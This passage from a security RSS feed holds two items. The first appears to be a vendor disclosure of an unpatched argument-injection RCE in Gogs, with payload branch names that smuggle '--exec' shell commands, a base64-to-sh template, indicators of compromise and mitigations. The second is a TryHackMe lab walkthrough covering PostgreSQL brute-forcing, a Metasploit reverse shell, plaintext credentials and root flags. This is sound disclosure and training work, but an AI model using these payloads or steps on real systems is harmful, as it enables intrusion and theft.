</span><span><span data-type="inlineCode">sh -c</span></span><span>) after replaying each commit. Argument injection into </span><span><span data-type="inlineCode">--exec</span></span><span> has been a </span><a href="https://www.synacktiv.com/en/publications/cve-2020-5260-git-credential-leak" target="_blank"><span>recurring</span></a><span> </span><a href="https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg"><span>source</span></a><span> of RCE vulnerabilities in Git-based applications. This is the exploitation primitive.</span></p><p><span>Gogs exposes 'Rebase before merging' as a per-repo setting (</span><span><span data-type="inlineCode">PullsAllowRebase</span></span><span>). It is not enabled by default, but any repo owner or admin can enable it under </span><span><span data-type="inlineCode">Settings &gt; Advanced</span></span><span>. By default, any user who creates a repo is automatically its owner, so the barrier to exploitation is low. Administrators can restrict repo creation globally (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = 0</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) or per-user (via </span><span><span data-type="inlineCode">Max Repo Creation</span></span><span> in the admin panel), but this does not prevent exploitation by users with write access to existing repositories.</span></p><h3><span>Root cause</span></h3><p><span>The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>Merge() function</span></a><span> in </span><span><span data-type="inlineCode">internal/database/pull.go</span></span><span> passes the PR's base branch name directly to </span><span><span data-type="inlineCode">git rebase</span></span><span> without a </span><a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html#tag_12_02" target="_blank"><span>-- separator</span></a><span> (a POSIX convention that signals the end of options, preventing subsequent arguments from being interpreted as flags):</span></p><p><span></span></p><pre language="go">if _, stderr, err = process.ExecDir(-1, tmpBasePath,
    fmt.Sprintf("PullRequest.Merge (git rebase): %s", tmpBasePath),
"git", "rebase", "--quiet", pr.BaseBranch, remoteHeadBranch); err != nil {</pre><p>⠀</p><p><span><span data-type="inlineCode">pr.BaseBranch</span></span><span> comes from the </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L447" target="_blank"><span>URL parameter</span></a><span> in </span><span><span data-type="inlineCode">internal/route/repo/pull.go</span></span><span>:</span></p><p><span></span></p><pre language="go">baseRef := infos[0]  // from strings.Split(c.Params("*"), "...")</pre><p>⠀</p><p><span>Both </span><span><span data-type="inlineCode">baseRef</span></span><span> and </span><span><span data-type="inlineCode">headRef</span></span><span> are validated via </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L482" target="_blank"><span>RevParse</span></a><span> before the PR is created. </span><span><span data-type="inlineCode">RevParse</span></span><span> is defined in the external </span><a href="https://github.com/gogs/git-module" target="_blank"><span>git-module</span></a><span> library and works by calling </span><span><span data-type="inlineCode">git rev-parse --verify &lt;ref&gt;</span></span><span>, which only checks whether the ref resolves to a valid Git object. It does not sanitize against argument injection, and it does not need to since </span><span><span data-type="inlineCode">git rev-parse --verify</span></span><span> treats </span><span><span data-type="inlineCode">--exec=...</span></span><span> as a ref name and fails if it doesn't resolve. However, the attacker pushes the malicious branch name (e.g. </span><span><span data-type="inlineCode">--exec=&lt;payload&gt;</span></span><span>) to the repo first, so </span><span><span data-type="inlineCode">RevParse</span></span><span> succeeds because the ref genuinely exists. The value is stored in the database and later passed as-is to the rebase command.</span></p><h3><span>Crafting the payload</span></h3><p><span>Git branch names can legally contain </span><span><span data-type="inlineCode">$</span></span><span>, </span><span><span data-type="inlineCode">{</span></span><span>, </span><span><span data-type="inlineCode">}</span></span><span>, </span><span><span data-type="inlineCode">=</span></span><span>, and </span><span><span data-type="inlineCode">-</span></span><span>. An attacker creates a branch named:</span></p><p><span></span></p><pre language="shell-session">--exec=touch${IFS}/tmp/rce_proof</pre><p>⠀</p><p><span>When this is used as </span><span><span data-type="inlineCode">pr.BaseBranch</span></span><span>, the rebase command becomes:</span></p><p><span></span></p><pre language="shell-session">git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'</pre><p>⠀</p><p><span>Git's argument parser treats </span><span><span data-type="inlineCode">--exec=touch${IFS}/tmp/rce_proof</span></span><span> as the </span><span><span data-type="inlineCode">--exec</span></span><span> flag, not a branch name. </span><span><span data-type="inlineCode">--exec</span></span><span> runs the value via </span><span><span data-type="inlineCode">sh -c</span></span><span> after each replayed commit, and </span><span><span data-type="inlineCode">${IFS}</span></span><span> expands to a space in the shell, bypassing Git's prohibition on spaces in branch names.</span></p><p><span>For commands containing characters forbidden in Git refs (</span><span><span data-type="inlineCode">:</span></span><span>, </span><span><span data-type="inlineCode">~</span></span><span>, </span><span><span data-type="inlineCode">^</span></span><span>, </span><span><span data-type="inlineCode">?</span></span><span>, </span><span><span data-type="inlineCode">*</span></span><span>, </span><span><span data-type="inlineCode">[</span></span><span>, </span><span><span data-type="inlineCode">\</span></span><span>, </span><span><span data-type="inlineCode">//</span></span><span>), such as URLs, the payload is base64-encoded:</span></p><p><span></span></p><pre language="shell-session">--exec=echo${IFS}&lt;base64_payload&gt;|base64${IFS}-d|sh</pre><p>⠀</p><p><span>The vulnerability affects Windows installations as well, but the payload delivery method differs. On Linux, the payload can be base64-encoded inline in the branch name (e.g. </span><span><span data-type="inlineCode">--exec=echo${IFS}&lt;b64&gt;|base64${IFS}-d|sh</span></span><span>). On Windows, this fails because NTFS forbids the </span><span>|</span><span> (pipe) character in filenames, and Git stores branch refs as files at </span><span><span data-type="inlineCode">refs/heads/&lt;branch_name&gt;</span></span><span>.</span></p><p><span>The solution is file-based payload delivery where the exploit commits a script file (e.g. </span><span><span data-type="inlineCode">.abcdef</span></span><span>) to the repository and uses a short, filesystem-safe branch name: </span><span><span data-type="inlineCode">--exec=sh${IFS}.abcdef</span></span><span>. An additional complication is that MSYS2's </span><span><span data-type="inlineCode">sh</span></span><span> (bundled with Git for Windows) mangles shell metacharacters like </span><span><span data-type="inlineCode">$</span></span><span>, </span><span><span data-type="inlineCode">&amp;</span></span><span>, and backticks in the payload before PowerShell can process them. To avoid this, the script file invokes </span><span><span data-type="inlineCode">cmd.exe //c .abcdef.bat</span></span><span> (where </span><span><span data-type="inlineCode">//c</span></span><span> is the MSYS2 escaping for </span><span><span data-type="inlineCode">/c</span></span><span>), which natively executes the </span><span><span data-type="inlineCode">.bat</span></span><span> file containing the PowerShell payload without shell interpretation issues. The </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> implements this cross-platform approach automatically.</span></p><h3><span>Execution flow during </span><span>Merge()</span></h3><p><span>The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L277-L305" target="_blank"><span>MergeStyleRebase code path</span></a><span> in </span><span>Merge()</span><span> runs these Git commands sequentially:</span></p><p><span></span></p><table><colgroup data-width="1430"><col><col><col></colgroup><thead><tr><th><p><span><strong>Step</strong></span></p></th><th><p><span><strong>Command</strong></span></p></th><th><p><span><strong>Result with malicious branch</strong></span></p></th></tr></thead><tbody><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L233" target="_blank"><span>1</span></a></p></td><td><p><span><span data-type="inlineCode">git clone -b '&lt;malicious&gt;' &lt;repo&gt; &lt;tmp&gt;</span></span></p></td><td><p><span>Succeeds - </span><span><span data-type="inlineCode">-b</span></span><span> consumes </span><span><span data-type="inlineCode">--exec=...</span></span><span> as the branch value</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L238-L248" target="_blank"><span>2</span></a></p></td><td><p><span><span data-type="inlineCode">git remote add head_repo &lt;repo&gt;</span></span><span> + </span><span><span data-type="inlineCode">git fetch head_repo</span></span></p></td><td><p><span>Succeeds normally</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>3</span></a></p></td><td><p><span><span data-type="inlineCode">git rebase --quiet '&lt;malicious&gt;' 'head_repo/feature'</span></span></p></td><td><p><span>RCE fires here. </span><span><span data-type="inlineCode">--exec=&lt;cmd&gt;</span></span><span> parsed as flag, command runs via </span><span><span data-type="inlineCode">sh -c</span></span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L290" target="_blank"><span>4</span></a></p></td><td><p><span><span data-type="inlineCode">git checkout -b &lt;tmpBranch&gt;</span></span></p></td><td><p><span>Succeeds (</span><span><span data-type="inlineCode">tmpBranch</span></span><span> is a server-generated timestamp)</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L297" target="_blank"><span>5</span></a></p></td><td><p><span><span data-type="inlineCode">git checkout '&lt;malicious&gt;'</span></span></p></td><td><p><span>Fails - Git interprets </span><span><span data-type="inlineCode">--exec=...</span></span><span> as an invalid option for checkout</span></p></td></tr></tbody></table><p>⠀</p><p><span>Step 5 fails and </span><span><span data-type="inlineCode">Merge()</span></span><span> returns HTTP 500, but the RCE already fired at Step 3. The 500 gets logged but doesn't undo anything.</span></p><p><span>Because the merge aborts partway through, the repository's git state is left corrupted (stuck in a partial rebase). This means the exploit can only be fired once per repository. In cases where the attacker created the repo themselves, this doesn't matter since the repo is deleted afterward, but when targeting an existing repository, the repo is effectively burned after a single use.</span></p><h3><span>Why the PR becomes mergeable</span></h3><p><span>For the exploit to work, the PR needs to reach "Mergeable" status so the merge button is available. This depends on an interesting race condition in how Gogs validates PRs:</span></p><ol><li><p><span>During PR creation, </span><span><span data-type="inlineCode">testPatch()</span></span><span> calls </span><span><span data-type="inlineCode">UpdateLocalCopyBranch(pr.BaseBranch)</span></span><span>. For a fresh repo with no local copy, it takes the Clone path, which includes </span><span><span data-type="inlineCode">--end-of-options</span></span><span>. The malicious branch name is treated as data, clone succeeds, </span><span><span data-type="inlineCode">testPatch</span></span><span> completes normally.</span></p></li><li><p><span>Since </span><span><span data-type="inlineCode">testPatch</span></span><span> didn't flag a conflict, the status gets promoted to </span><span><span data-type="inlineCode">PullRequestStatusMergeable</span></span><span>.</span></p></li><li><p><span>The background </span><span><span data-type="inlineCode">TestPullRequests</span></span><span> goroutine periodically re-checks PRs. On the next call, the local copy </span><span><em>does</em></span><span> exist, so </span><span><span data-type="inlineCode">UpdateLocalCopyBranch</span></span><span> takes the Checkout path instead. This one is missing </span><span><span data-type="inlineCode">--end-of-options</span></span><span>, so the checkout fails.</span></p></li><li><p><span>That error causes </span><span><span data-type="inlineCode">TestPullRequests</span></span><span> to skip </span><span><span data-type="inlineCode">checkAndUpdateStatus()</span></span><span>, meaning the PR stays Mergeable forever.</span></p></li></ol><p><span>The PoC leverages this by always creating a fresh repository, so the first </span><span><span data-type="inlineCode">testPatch</span></span><span> hits the Clone path and succeeds.</span></p><h3><span>Relationship to prior argument injection fixes</span></h3><p><span>Gogs has addressed argument injection vulnerabilities across multiple prior advisories. This vulnerability is in the same class but affects a different code path (</span><span><span data-type="inlineCode">Merge()</span></span><span>) that was never patched:</span></p><table><colgroup data-width="1504.3333333333335"><col><col><col><col></colgroup><thead><tr><th><p><span><strong>CVE</strong></span></p></th><th><p><span><strong>Description</strong></span></p></th><th><p><span><strong>Fix Applied</strong></span></p></th><th><p><span><strong>Advisory</strong></span></p></th></tr></thead><tbody><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39933" target="_blank"><span>CVE-2024-39933</span></a></p></td><td><p><span>Argument injection when tagging new releases</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--</span></span><span> separator to </span><span><span data-type="inlineCode">git tag</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg" target="_blank"><span>GHSA-m27m-h5gj-wwmg</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39932" target="_blank"><span>CVE-2024-39932</span></a></p></td><td><p><span>Argument injection during changes preview</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--end-of-options</span></span><span> to </span><span><span data-type="inlineCode">git diff</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-9pp6-wq8c-3w2c" target="_blank"><span>GHSA-9pp6-wq8c-3w2c</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-26194" target="_blank"><span>CVE-2026-26194</span></a></p></td><td><p><span>Release tag option injection in deletion</span></p></td><td><p><span>Migrated to safe git-module API</span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-v9vm-r24h-6rqm" target="_blank"><span>GHSA-v9vm-r24h-6rqm</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39930" target="_blank"><span>CVE-2024-39930</span></a></p></td><td><p><span>Argument injection in built-in SSH server</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--</span></span><span> separator to </span><span><span data-type="inlineCode">git upload-pack</span></span><span> / </span><span><span data-type="inlineCode">git receive-pack</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-vm62-9jw3-c8w3" target="_blank"><span>GHSA-vm62-9jw3-c8w3</span></a></p></td></tr></tbody></table><p><span>The </span><a href="https://github.com/gogs/git-module" target="_blank"><span>git-module library</span></a><span> (</span><span><span data-type="inlineCode">v1.8.7</span></span><span>) was hardened with </span><span><span data-type="inlineCode">--end-of-options</span></span><span> across </span><span><span data-type="inlineCode">Clone()</span></span><span>, </span><span><span data-type="inlineCode">Push()</span></span><span>, </span><span><span data-type="inlineCode">Fetch()</span></span><span>, and 28 other call sites. However, the </span><span><span data-type="inlineCode">Merge()</span></span><span> function in </span><span><span data-type="inlineCode">internal/database/pull.go</span></span><span> bypasses all of these protections because it uses raw </span><span><span data-type="inlineCode">process.ExecDir</span></span><span> (wrapping </span><span><span data-type="inlineCode">exec.Command</span></span><span> directly) instead of the safe git-module API. The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>git rebase call</span></a><span> was never migrated.</span></p><h2>Exploitation</h2><p><span>The </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> automates the full exploit chain against both Linux and Windows targets and supports two modes of operation:</span></p><ul><li><p><span><span data-type="inlineCode">own_repo</span></span><span> (default): The module creates a temporary repository under the attacker's account, runs the exploit, and deletes the repo on cleanup. This works on any default-configured instance and supports all payload types.</span></p></li><li><p><span><span data-type="inlineCode">existing_repo</span></span><span>: The module targets a repository the attacker already has write and merge access to. This is useful on instances where repo creation is restricted. Only command payloads are supported in this mode (staged payloads would require multiple merge cycles, which is not possible due to the repo corruption described above). Cleanup deletes the malicious branches and closes the PR, but the repository's git state remains corrupted.</span></p></li></ul><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt96293b4d910dac8f/6a17457e02f3b52e2dcf8ba3/image1.png" alt="image1.png" caption="Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="image1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt96293b4d910dac8f/6a17457e02f3b52e2dcf8ba3/image1.png" data-sys-asset-uid="blt96293b4d910dac8f" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu." data-sys-asset-alt="image1.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu.</figcaption></div></figure><p>⠀</p><p><span>On Windows, the module uses the file-based delivery method described above to work around NTFS filename restrictions.</span></p><p>⠀</p><p><span><em>Figure 2: Metasploit module obtaining a Meterpreter session on a Gogs 0.14.2 instance running on Windows 11.</em></span></p><h2>Indicators of compromise (IoCs)</h2><p><span>Defenders should watch the Gogs server logs for error entries matching this pattern:</span></p><p><span></span></p><pre language="html">[E] ...merge: git checkout '--exec=&lt;...&gt;': exit status 128 - error: unknown option `exec=&lt;...&gt;'</pre><p>⠀</p><p><span>This is logged via </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L425" target="_blank"><span>c.Error(err, "merge")</span></a><span>, which writes the full error (including the malicious branch name) to the server log at ERROR level. Note that a more cleverly written exploit may not be this obvious in log files.</span></p><p><span>If the attack targeted an existing repository (rather than one the attacker created and deleted), additional artifacts will be present: the malicious branch name (e.g. </span><span><span data-type="inlineCode">--exec=...</span></span><span>) in the repository's branch listing, a failed pull request in the PR history, and the repository itself will be in a corrupted git state (returning HTTP 500 on certain operations). On Windows, the committed payload files (e.g. </span><span><span data-type="inlineCode">.abcdef</span></span><span>, </span><span><span data-type="inlineCode">.abcdef.bat</span></span><span>) will also remain in the git history. Administrators should audit repositories for branch names beginning with </span><span><span data-type="inlineCode">--</span></span><span>.</span></p><p><span>The Metasploit module also creates a Gogs API token (named </span><span><span data-type="inlineCode">msf_&lt;hex&gt;</span></span><span>) during exploitation. Gogs does not expose a token deletion API endpoint, so this token persists after the attack and remains valid until manually revoked via the web UI or database. Defenders should check user token lists at </span><span><span data-type="inlineCode">/-/user/settings/applications</span></span><span> for unexpected entries.</span></p><p><span>The payload file used during exploitation is written to the repository's bare git directory on the server filesystem and will persist after the attack.</span></p><h2>Remediation</h2><p><span>No patch is available at the time of publication. Rapid7 reported this vulnerability to the Gogs maintainers on March 17, 2026, and followed up multiple times through May 2026. The maintainer acknowledged receipt on March 28, 2026, but has not provided a fix or further response. Users of Gogs should evaluate the following mitigations:</span></p><ul><li><p><span>Restricting user registration (</span><span><span data-type="inlineCode">DISABLE_REGISTRATION = true</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) to prevent untrusted users from creating accounts. This is the most impactful mitigation since the exploit is self-contained within a single user's repository.</span></p></li><li><p><span>Restricting repository creation (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = 0</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) to prevent users from creating their own repos. This can also be set per-user via </span><span><span data-type="inlineCode">Max Repo Creation</span></span><span> in the admin panel. This blocks the easiest attack path (creating a new repo with rebase enabled), but does not prevent exploitation by users with write access to existing repositories.</span></p></li><li><p><span>Auditing rebase merge settings: While "Rebase before merging" can be </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/repo.go#L219" target="_blank"><span>disabled per-repo</span></a><span> under </span><span><span data-type="inlineCode">Settings &gt; Advanced</span></span><span>, note that this is not an effective defense against a malicious user who owns or has admin access to a repo, since they can re-enable rebase at will. There is no global or organization-level setting to restrict this. Disabling rebase is only useful for reducing the attack surface on shared repositories where the attacker has write access but not admin privileges.</span></p></li></ul><h2>Disclosure timeline</h2><ul><li><p><span><strong>March 16, 2026:</strong></span><span> Vulnerability discovered and validated against Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> and </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span>b53d3162</span><span>).</span></p></li><li><p><span><strong>March 17, 2026:</strong></span><span> Reported to Gogs maintainers via GitHub Security Advisory (GHSA-qf6p-p7ww-cwr9).</span></p></li><li><p><span><strong>March 28, 2026:</strong></span><span> Maintainer acknowledges receipt.</span></p></li><li><p><span><strong>April 21, 2026:</strong></span><span> Contacted maintainer for a status update (no response).</span></p></li><li><p><span><strong>May 6, 2026:</strong></span><span> Reminded maintainer of previously planned disclosure date, and offered extension if required (no response).</span></p></li><li><p><span><strong>May 20, 2026:</strong></span><span> Advised maintainer the blog release date is finalized for May 28, 2026 (no response).</span></p></li><li><p><span><strong>May 28, 2026:</strong></span><span> This disclosure.</span></p></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Poster TryHackMe Walkthrough | PostgreSQL Exploitation & Privilege Escalation]]></title>
<description><![CDATA[Poster — TryHackMe WalkthroughPosterIntroductionIn this walkthrough, I solved the Poster room from TryHackMe. The room focuses on PostgreSQL exploitation, credential discovery, and privilege escalation caused by insecure configurations inside the database and web application.I started with servic...]]></description>
<link>https://tsecurity.de/de/3541577/hacking/poster-tryhackme-walkthrough-postgresql-exploitation-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541577/hacking/poster-tryhackme-walkthrough-postgresql-exploitation-privilege-escalation/</guid>
<pubDate>Sat, 23 May 2026 10:36:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Poster — TryHackMe Walkthrough</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/276/1*VzOtvgHVoozsTIIcRoKw2A.png"></figure><p><a href="https://tryhackme.com/room/poster">Poster</a></p><h3>Introduction</h3><p>In this walkthrough, I solved the <em>Poster</em> room from TryHackMe. The room focuses on PostgreSQL exploitation, credential discovery, and privilege escalation caused by insecure configurations inside the database and web application.</p><p>I started with service enumeration, gained authenticated PostgreSQL access, moved laterally between users, and finally escalated privileges to root by abusing exposed credentials and misconfigured sudo permissions.</p><h3>Initial Enumeration</h3><p>I started with a basic Nmap scan to identify the exposed services running on the target machine.</p><pre>~$ nmap -sV 10.49.190.166</pre><pre>PORT     STATE SERVICE    VERSION<br>22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)<br>80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))<br>5432/tcp open  postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.23</pre><p>The scan revealed three open ports:</p><ul><li>SSH running on port 22</li><li>HTTP running on port 80</li><li>PostgreSQL running on port 5432</li></ul><p>At this stage, the PostgreSQL service immediately stood out since the room description hinted toward an RDBMS setup.</p><h3>Finding Vulnerability</h3><p>To interact with the PostgreSQL service, I moved into Metasploit and started looking for available PostgreSQL auxiliary modules.</p><pre>msfconsole -q</pre><p>After launching Metasploit, I searched for PostgreSQL-related auxiliary modules.</p><pre>search auxiliary postgresql</pre><p>The results displayed several PostgreSQL modules available inside Metasploit.</p><p>One module that immediately caught my attention was:</p><pre>auxiliary/scanner/postgres/postgres_login</pre><p>This module is used to brute force PostgreSQL credentials using common usernames and passwords.</p><p>I selected the module using:</p><pre>use 4</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n172tiGUBPAQ7LLACjjmfA.png"></figure><p>Before running it, I checked the required configuration.</p><pre>show config</pre><p>The only mandatory value that needed to be configured was the target IP address.</p><pre>set RHOSTS &lt;IP&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bFG2loVb8tv32wP06_GURg.png"></figure><p>With the configuration completed, I executed the module.</p><pre>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XYZzc0Q_Slk4QFUDOMKx1Q.png"></figure><p>The scan successfully discovered valid PostgreSQL credentials:</p><pre>postgres:password</pre><p>Now that I had working credentials, the next step was to find a module that would allow authenticated interaction with the PostgreSQL server.</p><p>I returned back and searched for PostgreSQL auxiliary modules again.</p><pre>back<br>search auxiliary postgresql</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aAE5-aSRS3fXHEXcwLfSzg.png"></figure><p>This time, I selected:</p><pre>auxiliary/admin/postgres/postgres_sql</pre><p>The module allows execution of SQL queries against the PostgreSQL server using valid credentials.</p><p>I configured the module with the discovered password and target IP.</p><pre>use 6<br>show options<br>set RHOSTS &lt;IP&gt;<br>set PASSWORD password</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*veRg0yZwS5SSfjYhq9CYrw.png"></figure><p>After setting the required options, I ran the module.</p><pre>run</pre><p>The authentication succeeded, confirming valid access to the PostgreSQL database server.</p><pre>PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*myWC1cmDNNpl8aDlGcxyTg.png"></figure><h3>Credential Discovery</h3><p>After confirming authenticated access to PostgreSQL, my next objective was to dump the database user hashes.</p><p>I returned back to the Metasploit console and searched for a module related to PostgreSQL hash dumping.</p><pre>back<br>search auxiliary scanner postgre hashdump</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ts40jXGQOYSNJ7qkwzopiQ.png"></figure><p>The search returned the PostgreSQL hashdump module, which can extract password hashes from the database.</p><p>I selected the module and configured it with the previously discovered credentials.</p><pre>use 0<br>show options<br>set RHOST 10.49.190.166<br>set PASSWORD password</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*L6Jkk7NFqeETNCo1Bd_Ncg.png"></figure><p>Once everything was configured, I executed the module.</p><pre>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/644/1*X9mD3hiRq0eMSEGompTfrg.png"></figure><p>The module successfully dumped the PostgreSQL user hashes from the server.</p><h3>User Enumeration</h3><p>With authenticated database access confirmed, I moved on to another PostgreSQL auxiliary module that allows reading files directly from the target system.</p><p>I went back again and searched for PostgreSQL auxiliary modules.</p><pre>back<br>search auxiliary postgresql</pre><p>From the available modules, I selected:</p><pre>auxiliary/admin/postgres/postgres_readfile</pre><p>Alternatively, it could also be selected directly using:</p><pre>use 5</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BNP_74OAxe2_FatHCIwItw.png"></figure><p>Before running the module, I checked the available options.</p><pre>show options</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BNYyNvLwAI-H8TjvAlJ36w.png"></figure><p>After configuring the required parameters, I executed the module.</p><pre>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZJgM-DEog7hKCFaX3A_uoQ.png"></figure><p>The module successfully read files from the target machine using the authenticated PostgreSQL session.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*74Km5BTmS8jzNAKyeeDdQg.png"></figure><h3>Initial Access</h3><p>After confirming authenticated PostgreSQL access, the next step was to gain command execution on the target machine.</p><p>I returned back to Metasploit and searched for PostgreSQL exploit modules related to command execution.</p><pre>back<br>search exploit postgres cmd</pre><p>From the available results, I selected:</p><pre>exploit/multi/postgres/postgres_copy_from_program_cmd_exec</pre><p>This module allows arbitrary command execution using valid PostgreSQL credentials.</p><p>I loaded the module using:</p><pre>use 0</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zll0sozMZjA-BbggOlHUsQ.png"></figure><p>Next, I configured the required options.</p><pre>show options<br>set RHOST &lt;IP&gt;<br>set PASSWORD password<br>set LHOST tun0</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VdB6AyrLlI9SVHODCb7txw.png"></figure><p>Once everything was configured, I executed the exploit.</p><pre>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FO0Awyo3UWvoFgvLB3yBxw.png"></figure><p>The exploit successfully returned a shell on the target machine.</p><p>To make the shell more stable and interactive, I upgraded it using Python PTY.</p><pre>python3 -c 'import pty;pty.spawn("/bin/bash")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-zFFTK93kKXCHSU9yQ19Tw.png"></figure><h3>Lateral Movement</h3><p>After getting shell access, I started enumerating the system manually.</p><p>Inside the /home directory, I found two user folders. One of them belonged to alison, which contained the user flag, but the current user did not have permission to access it.</p><p>While checking the second user directory, I discovered a credentials file inside dark's home directory.</p><pre>cd /home<br>cat /home/dark/credentials.txt</pre><p>The file contained valid credentials for the dark user.</p><pre>dark:qwerty1234#!hackme</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/853/1*6QrellM2q8jmQVOXduKW9Q.png"></figure><p>I used the discovered password to log in through SSH for a cleaner and more stable session.</p><pre>ssh dark@10.49.190.166<br>dark@10.49.190.166's password: qwerty1234#!hackme<br>$  </pre><h3>Credential Discovery</h3><p>Even after switching to the dark user, I still did not have permission to access Alison’s user flag.</p><pre>cat /home/alison/user.txt<br>cat: /home/alison/user.txt: Permission denied</pre><p>At this point, I started checking the web application files for any exposed credentials or sensitive configuration files.</p><p>Inside the web root directory, I found a config.php file.</p><pre>cd /var/www/html/<br>ls</pre><pre>config.php  poster</pre><p>I opened the configuration file to inspect its contents.</p><pre>cat config.php</pre><pre>&lt;?php <br>	<br>	$dbhost = "127.0.0.1";<br>	$dbuname = "alison";<br>	$dbpass = "p4ssw0rdS3cur3!#";<br>	$dbname = "mysudopassword";<br>?&gt;</pre><p>The file exposed valid credentials for the alison user.</p><h3>Lateral Movement</h3><p>Using the discovered password, I switched from the dark user to alison.</p><pre>su alison<br>Password: p4ssw0rdS3cur3!#</pre><p>After authenticating successfully, I accessed Alison’s home directory and read the user flag.</p><pre>cd<br>cat user.txt</pre><h3>User Flag</h3><pre>THM{postgresql_fa1l_conf1gurat1on}</pre><h3>Privilege Escalation Enumeration</h3><p>With access as alison, I checked the sudo permissions assigned to the account.</p><pre>sudo -l</pre><pre>alison@ubuntu:~$ sudo -l<br>[sudo] password for alison: p4ssw0rdS3cur3!#<br>Matching Defaults entries for alison on ubuntu:<br>    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin<br>User alison may run the following commands on ubuntu:<br>    (ALL : ALL) ALL</pre><p>The output confirmed that the alison user had full sudo privileges on the machine.</p><h3>Root Access</h3><p>I escalated directly to a root shell using:</p><pre>sudo -s</pre><p>After obtaining root access, I read the root flag.</p><pre>cat /root/root.txt</pre><h3>Root Flag</h3><pre>THM{c0ngrats_for_read_the_f1le_w1th_credent1als}</pre><figure><img alt="" 